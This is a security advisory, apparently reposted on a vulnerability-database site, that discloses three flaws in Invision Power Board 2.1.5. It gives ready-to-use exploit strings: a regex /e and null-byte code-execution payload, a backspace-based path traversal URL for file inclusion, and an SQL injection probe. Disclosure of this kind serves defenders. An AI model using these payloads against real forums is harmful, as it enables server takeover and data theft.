Invision Vulnerabilities, including remote code execution

Advisory Content :

Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org

1) Code execution

sources/action_public/search.php line 1261
$this->output = preg_replace(
"#(value=["']{$this->ipsclass->input['lastdate']}["'])#i", "\1
selected='selected'",
$this->output );

The input string is not properly sanitized which can lead to arbitrary code
execution.
Example exploit:

- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to find text die just by your username (so only one
result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press
return
- The code should have been executed

The lastdate string alters the regex to accept anything inside eval() and
parse it as code, as
an #e modifier is added and then %00 used which will be parsed as a null
byte and truncate
the string thus removing the original )#i part.

Due to selected='selected' also being executed as php code a space and //
has to be used to turn
the text into a comment so it will be ignored by PHP.

As you can see this is just the beginning. You can upload an avatar with
php code somewhere in it
and changed the above example to include() it thus running as much PHP code
as you like. On default
PHP setups you can also include() remote files.

2) Remote file inclusion (requires admin)

sources/action_admin/paysubscriptions.php line 282
$gateway = trim( $this->ipsclass->input['name'] );

The input string is not properly sanitized and can be used to transverse
directories in
this later include on line 307:
require_once( ROOT_PATH .
'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );

This code may look safe as the prefix to the file is hardcoded,
unfortunately the backspace
character may be used to remove this prefix thus allowing ../../
combinations to execute code
from any file ending in .php.

Example:
http://host/admin.php?adsess=...§ion=content&act=msubs&code=install-
gateway&name=
%08%08%08%08%08%08%08%08%08/../class_gw_test

The above is a simple POC which installs the 'test' gateway. %08 will be
parsed as the backspace character, 9 of them are required to remove
'class_gw_'.

Where as this is not a serious threat, someone with access to the system
(shared server,
with a /tmp directory?) who happened to gain/have access to the admin panel
would
be able to use this to run arbitrary code on the server in the correct
circumstances.

3) SQL Injection (limited use)

sources/lib/func_taskmanager.php line 70
$this->cron_key = substr( trim(stripslashes($_REQUEST['ck'])), 0, 32 );

The input from 'ck' is not sanitized which could lead to an SQL Injection
(limited to 32 characters)
on line 113: 'where' => "task_cronkey='".$this->cron_key."'",

Example: http://www.host.com/index.php?act=task&ck='

Although this is limited to 32 characters, it still may pose a risk in
certain circumstances.

Flaws researched by IceShaman and Wells
Flaw #1 was first discovered by "securicore" security group and used to
exploit my forums. This led
to me doing a quick audit of the code to find it (it goes without saying
that I succeeded).

- IceShaman

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Invision Vulnerabilities, including remote code execution